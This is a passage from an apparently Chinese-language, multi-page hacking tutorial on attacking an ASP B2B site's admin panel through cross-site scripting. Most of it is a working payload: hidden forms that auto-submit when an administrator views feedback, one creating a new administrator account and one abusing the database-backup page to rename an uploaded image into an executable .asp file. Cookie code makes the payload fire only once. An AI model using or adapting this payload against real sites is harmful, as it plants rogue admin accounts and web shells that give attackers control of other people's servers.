（图12）

其实,我们可以将上面的二个步骤合为一个步骤来实现.

但是大家注意到没有,当管理员查看信息反馈后,会弹出”此用户已存在,请重新输入”,”数据库备份成功”的警告框,当你点击确定后,将反复提交跨站的代码,从而造成死循环,这样一来,跨站就没得玩了,看来还得解决这个问题,上网去找了些资料,高人已给出了解决的办法,就是利用cookies来做一个只允许访问一次的页面,不让我们的跨站代码重复的提交,完整的代码如下:

代码片段十： <html> <form name="form" method="post" action="http://127.0.0.1/b2b/admin/administrator/administrator.asp? action=save"> <input name="user" value="初学者"> <input name="pass" value="77169"> </form> <form name="form1" method="post" action="http://127.0.0.1/b2b/admin/system/admin_backdb.asp? action=back"> <input  name="currf" value="../ ../UserDocument/marcosa/Picture/20071124100000.gif "> <input  name="backf"  value="huaxia"> <input  name="backfy"  value="1.asp"> </form> <SCRIPT language="JavaScript"> <!-- function huaxia(){ document.form.submit() document.form1.submit() } function get_cookie(Name) { var search = Name + "=" var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search) if (offset != -1) { offset += search.length end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)) } } return returnvalue; }   function cnt_net(){ if (get_cookie('初学者')==''){ huaxia() document.cookie="初学者=77169" } } cnt_net() //--> </SCRIPT> </html>

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页